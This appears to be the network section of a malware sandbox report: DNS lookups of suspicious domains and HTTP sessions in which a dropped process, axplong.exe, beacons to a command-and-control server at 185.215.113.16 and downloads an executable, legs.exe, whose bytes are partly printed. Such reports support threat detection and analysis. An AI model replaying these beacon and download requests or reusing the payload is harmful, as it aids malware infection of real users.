                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.546854019 CET44349907185.199.108.133192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.546900988 CET44349907185.199.108.133192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.546901941 CET49907443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.546931028 CET49907443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.546952963 CET49907443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.547619104 CET49907443192.168.2.4185.199.108.133
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.547635078 CET44349907185.199.108.133192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584578991 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584599972 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584650993 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584672928 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584687948 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584722996 CET4992080192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584748983 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584759951 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584763050 CET4992080192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584789991 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584800959 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584806919 CET4992080192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584835052 CET4992080192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584836960 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584923983 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584934950 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584958076 CET8049920135.181.65.216192.168.2.4
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584959984 CET4992080192.168.2.4135.181.65.216
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:26.584968090 CET8049920135.181.65.216192.168.2.4

                                                                                                                                                                                                                                                  DNS Queries

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.412074089 CET192.168.2.41.1.1.10xc4e8Standard query (0)pancakedipyps.clickA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:14.309777021 CET192.168.2.41.1.1.10x9325Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:15.942667961 CET192.168.2.41.1.1.10xea3fStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:15.942929983 CET192.168.2.41.1.1.10x21a7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:16.226708889 CET192.168.2.41.1.1.10x73e1Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.130558968 CET192.168.2.41.1.1.10x2b8dStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.130737066 CET192.168.2.41.1.1.10xe6f3Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.420474052 CET192.168.2.41.1.1.10x6f43Standard query (0)rabidcowse.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:20.131670952 CET192.168.2.41.1.1.10xe79cStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:20.131817102 CET192.168.2.41.1.1.10xbd4eStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:27.669537067 CET192.168.2.41.1.1.10xc2adStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:27.669728041 CET192.168.2.41.1.1.10xfc9fStandard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:29.610721111 CET192.168.2.41.1.1.10x25fdStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:29.610768080 CET192.168.2.41.1.1.10xff50Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:33.720782042 CET192.168.2.41.1.1.10xc49aStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:33.720865011 CET192.168.2.41.1.1.10xa9cbStandard query (0)home.fortth14vs.top28IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:35.105995893 CET192.168.2.41.1.1.10x834dStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:35.106041908 CET192.168.2.41.1.1.10x5d24Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.660348892 CET192.168.2.41.1.1.10xab77Standard query (0)sexo.gofile.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:56.866925955 CET192.168.2.41.1.1.10xab26Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:56.867216110 CET192.168.2.41.1.1.10xcf73Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:00.020273924 CET192.168.2.41.1.1.10xcc7cStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:00.020428896 CET192.168.2.41.1.1.10xc913Standard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.376580000 CET192.168.2.41.1.1.10xe9aaStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.376637936 CET192.168.2.41.1.1.10xf975Standard query (0)httpbin.org28IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.013094902 CET192.168.2.41.1.1.10x4014Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.013151884 CET192.168.2.41.1.1.10x1923Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.492841959 CET192.168.2.41.1.1.10xe41Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.492909908 CET192.168.2.41.1.1.10x9bfeStandard query (0)home.fortth14vs.top28IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.893524885 CET192.168.2.41.1.1.10x99e6Standard query (0)sexo.gofile.funA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:13.955924988 CET192.168.2.41.1.1.10xa651Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:13.955987930 CET192.168.2.41.1.1.10xe663Standard query (0)home.fortth14vs.top28IN (0x0001)false

                                                                                                                                                                                                                                                  DNS Answers

                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.425865889 CET1.1.1.1192.168.2.40xc4e8No error (0)pancakedipyps.click188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:10.425865889 CET1.1.1.1192.168.2.40xc4e8No error (0)pancakedipyps.click188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:14.316497087 CET1.1.1.1192.168.2.40x9325No error (0)github.com140.82.121.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:15.949462891 CET1.1.1.1192.168.2.40xea3fNo error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:15.949806929 CET1.1.1.1192.168.2.40x21a7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:16.234057903 CET1.1.1.1192.168.2.40x73e1No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:16.234057903 CET1.1.1.1192.168.2.40x73e1No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:16.234057903 CET1.1.1.1192.168.2.40x73e1No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:16.234057903 CET1.1.1.1192.168.2.40x73e1No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.137285948 CET1.1.1.1192.168.2.40xe6f3No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.137912035 CET1.1.1.1192.168.2.40x2b8dNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.137912035 CET1.1.1.1192.168.2.40x2b8dNo error (0)plus.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.432631969 CET1.1.1.1192.168.2.40x6f43No error (0)rabidcowse.shop172.67.156.127A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:19.432631969 CET1.1.1.1192.168.2.40x6f43No error (0)rabidcowse.shop104.21.7.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:20.138380051 CET1.1.1.1192.168.2.40xe79cNo error (0)play.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:27.688323021 CET1.1.1.1192.168.2.40xc2adNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:27.688323021 CET1.1.1.1192.168.2.40xc2adNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:30.322443008 CET1.1.1.1192.168.2.40x25fdNo error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:34.442681074 CET1.1.1.1192.168.2.40xc49aNo error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:35.884109974 CET1.1.1.1192.168.2.40x834dNo error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.673074961 CET1.1.1.1192.168.2.40xab77No error (0)sexo.gofile.fun104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.673074961 CET1.1.1.1192.168.2.40xab77No error (0)sexo.gofile.fun104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.673074961 CET1.1.1.1192.168.2.40xab77No error (0)sexo.gofile.fun104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.673074961 CET1.1.1.1192.168.2.40xab77No error (0)sexo.gofile.fun104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.673074961 CET1.1.1.1192.168.2.40xab77No error (0)sexo.gofile.fun104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.673074961 CET1.1.1.1192.168.2.40xab77No error (0)sexo.gofile.fun104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:46.673074961 CET1.1.1.1192.168.2.40xab77No error (0)sexo.gofile.fun104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:56.873779058 CET1.1.1.1192.168.2.40xab26No error (0)www.google.com142.250.185.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:56.873792887 CET1.1.1.1192.168.2.40xcf73No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:00.026887894 CET1.1.1.1192.168.2.40xcc7cNo error (0)play.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.383939028 CET1.1.1.1192.168.2.40xe9aaNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:05.383939028 CET1.1.1.1192.168.2.40xe9aaNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:07.798384905 CET1.1.1.1192.168.2.40x4014No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.905869961 CET1.1.1.1192.168.2.40x99e6No error (0)sexo.gofile.fun104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.905869961 CET1.1.1.1192.168.2.40x99e6No error (0)sexo.gofile.fun104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.905869961 CET1.1.1.1192.168.2.40x99e6No error (0)sexo.gofile.fun104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.905869961 CET1.1.1.1192.168.2.40x99e6No error (0)sexo.gofile.fun104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.905869961 CET1.1.1.1192.168.2.40x99e6No error (0)sexo.gofile.fun104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.905869961 CET1.1.1.1192.168.2.40x99e6No error (0)sexo.gofile.fun104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:12.905869961 CET1.1.1.1192.168.2.40x99e6No error (0)sexo.gofile.fun104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:13.260926962 CET1.1.1.1192.168.2.40xe41No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Jan 3, 2025 09:51:14.533451080 CET1.1.1.1192.168.2.40xa651No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                  HTTP Packets

                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.449770185.215.113.16802800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:03.337713003 CET156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                  Data Ascii: st=s
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.061546087 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:02 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 1 0
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.065677881 CET308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Content-Length: 154
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                                                                                                                                                                                                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.321991920 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:03 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Data Raw: 35 31 37 0d 0a 20 3c 63 3e 31 30 30 31 35 32 37 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 32 66 66 39 66 61 65 39 66 64 34 66 37 33 65 62 23 31 30 30 34 38 39 39 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 38 62 61 38 62 39 66 63 36 63 66 64 66 30 61 38 65 33 31 33 32 35 65 62 66 63 36 33 23 31 30 30 38 36 35 39 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 33 30 65 38 66 38 66 62 62 66 34 39 35 34 66 38 65 35 36 61 37 36 37 63 64 63 37 37 39 34 35 62 39 32 62 63 37 31 62 39 23 31 30 30 39 35 37 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 517 <c>1001527001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a72ff9fae9fd4f73eb#1004899001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db348ba8b9fc6cfdf0a8e31325ebfc63#1008659001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954f8e56a767cdc77945b92bc71b9#1009574001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a724f3f1fee21838a0e17e76#1010456001+++aa0ed3651df49fa1a20b1eacd80f67bcdc4af948887c9aa3aee931e5aba3e21b38bdb529747dd37adc48d9b56cbd8cace5599ea4ff339403b2b2461f4f733bd6f211309d82f41e6cde145008333ef11b9bde9d#1010458001+++aa0ed3651df49fa1a20b1eacd80f67bcdc4af948887c9aa3aee931e5aba3e21b38bdb5296973d47f890893ab6cb09aa8e51389e4ec328f02bfb9081c076e3ddabc0c6dde8aac4b398e414f5c7a6a#1010681001+++aa0ed3651df49fa1a20b1eacd80f67bcdc4af948887c9aa3aee931e5aba3e21b38bdb5296973d47f890f93ab6cb09aa8e51389e4ec328f02bfb9081c076e3ddabc0c6ade85a9463881513e53636cab579fd58c3c4306708547cdace6#1010747001+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2dd0bebeed22f1b2e8b2446fe1e928766ada#1 [TRUNCATED]
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.322005033 CET258INData Raw: 32 31 36 65 35 30 61 64 63 32 64 64 30 61 30 61 33 65 36 32 36 62 33 65 66 66 62 62 64 34 65 36 34 65 33 61 61 36 33 36 62 37 37 23 31 30 31 30 37 34 39 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 64 66 34 34 63 35 65 66 35 38
                                                                                                                                                                                                                                                  Data Ascii: 216e50adc2dd0a0a3e626b3effbbd4e64e3aa636b77#1010749001+++aa0ed36554e19fbdf44c5ef5835f7deb9d16e70b8b7293a8b9a736f2f4eba64f39a1f6677d76d073dd5fc4bc#1010750001+++aa0ed36554e19fbdf44c5ef5835f7deb9d16e70b8b7293a8b9a736f2f4eba64f3aa1f6677d76d073dd5f
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.323776960 CET52OUTGET /inc/legs.exe HTTP/1.1
                                                                                                                                                                                                                                                  Host: 185.215.113.16
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551446915 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:03 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 776832
                                                                                                                                                                                                                                                  Last-Modified: Tue, 17 Dec 2024 11:09:59 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67615c07-bda80"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 09 00 a3 1e 60 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 00 00 aa 01 00 00 c0 00 00 00 00 00 00 52 59 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 0c 00 00 08 00 00 00 00 00 00 03 00 40 83 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 37 02 00 3c 00 00 00 00 a0 02 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 ac 0b 00 80 2e 00 00 00 b0 02 00 40 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 fe 01 00 18 00 00 00 e8 cd 01 00 c0 00 00 00 00 00 00 00 00 00 00 00 28 39 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL`g"RY@@7<.@X(9T.text `.rdata$@@.datal"P>@.bsSST `.tlsV@.rsrcX@@.reloc@Z@B.bsst@.bssp@
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551464081 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551477909 CET1236INData Raw: ec 30 8b 5c 24 44 a1 c0 57 42 00 31 e0 89 44 24 2c 8b 43 3c 8b 6c 18 78 8b 44 1d 18 85 c0 0f 84 4f 01 00 00 8b 4c 1d 20 01 d9 89 4c 24 08 48 89 44 24 10 c7 04 24 00 00 00 00 89 5c 24 04 89 6c 24 0c 8b 44 24 08 8b 30 01 de 0f 57 c0 f2 0f 11 44 24
                                                                                                                                                                                                                                                  Data Ascii: 0\$DWB1D$,C<lxDOL L$HD$$\$l$D$0WD$$WD$V(w"|$$D$(WVt$VfSCErPPD$|$$l$(WVPe\$Dl$t$h5Vm
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551563978 CET1236INData Raw: f0 68 6d 64 85 93 ff 35 6c 64 42 00 e8 16 fb ff ff 83 c4 08 89 45 e4 8b 55 e4 ff d2 bb 49 05 00 00 be 11 50 42 00 6a 11 68 00 50 42 00 53 56 e8 96 fc ff ff 83 c4 10 6a 0a 68 00 c0 41 00 57 8b 7d 08 57 e8 82 fc ff ff 83 c4 10 68 01 dc af 8a ff 35
                                                                                                                                                                                                                                                  Data Ascii: hmd5ldBEUIPBjhPBSVjhAW}Wh5ldBMQj@SVuM11^_[]}uVPB'jT9BUSWV,\$@WB1D$(d=0w@ldBhb-/5ldBE(AD$
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551574945 CET1236INData Raw: 42 00 31 e0 89 44 24 08 8b 01 8b 40 04 8b 7c 01 38 85 ff 74 48 89 e3 89 d9 56 e8 1a ff ff ff 80 7b 04 00 74 31 8b 07 89 f9 ff 50 34 83 f8 ff 0f 94 c0 8b 0e 8b 51 04 8d 0c 16 83 7c 16 38 00 0f 94 c4 08 c4 0f b6 c4 c1 e0 02 0b 44 16 0c 6a 00 50 e8
                                                                                                                                                                                                                                                  Data Ascii: B1D$@|8tHV{t1P4Q|8DjPnL$1^_[WV D$,WB1T$A#AuL$1 ^_|$0t1PP?BBDBD@Bt$RWhABV?
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551585913 CET1236INData Raw: 78 01 81 ff 00 10 00 00 72 14 8b 51 fc 83 c1 fc 29 d1 83 f9 20 73 33 83 c0 24 89 c7 89 d1 57 51 e8 49 0a 00 00 83 c4 08 c7 06 5c c3 41 00 8b 4c 24 18 31 e1 e8 74 0a 00 00 89 f0 83 c4 1c 5e 5f 5b 5d c2 0c 00 e8 fd f8 ff ff e8 00 95 00 00 55 89 e5
                                                                                                                                                                                                                                                  Data Ascii: xrQ) s3$WQI\AL$1t^_[]USWV0WB1EUP WCWCzzrMw{C JUCE@rP|P\C{MK GWuP
                                                                                                                                                                                                                                                  Jan 3, 2025 09:50:04.551660061 CET1236INData Raw: 00 00 00 83 c4 04 8b 10 89 c1 56 ff 52 20 89 c3 8b 4f 04 85 c9 74 11 8b 01 ff 50 08 85 c0 74 08 8b 10 89 c1 6a 01 ff 12 8b 4c 24 08 31 e1 e8 a6 05 00 00 89 d8 83 c4 0c 5e 5f 5b c2 04 00 53 57 56 83 ec 0c 8b 74 24 1c a1 c0 57 42 00 31 e0 89 44 24
                                                                                                                                                                                                                                                  Data Ascii: VR OtPtjL$1^_[SWVt$WB1D$L$j|dB$eBdPu3u-VPt94$VP<$=|dBL$bL$1^_[WVWB1D$9u&j
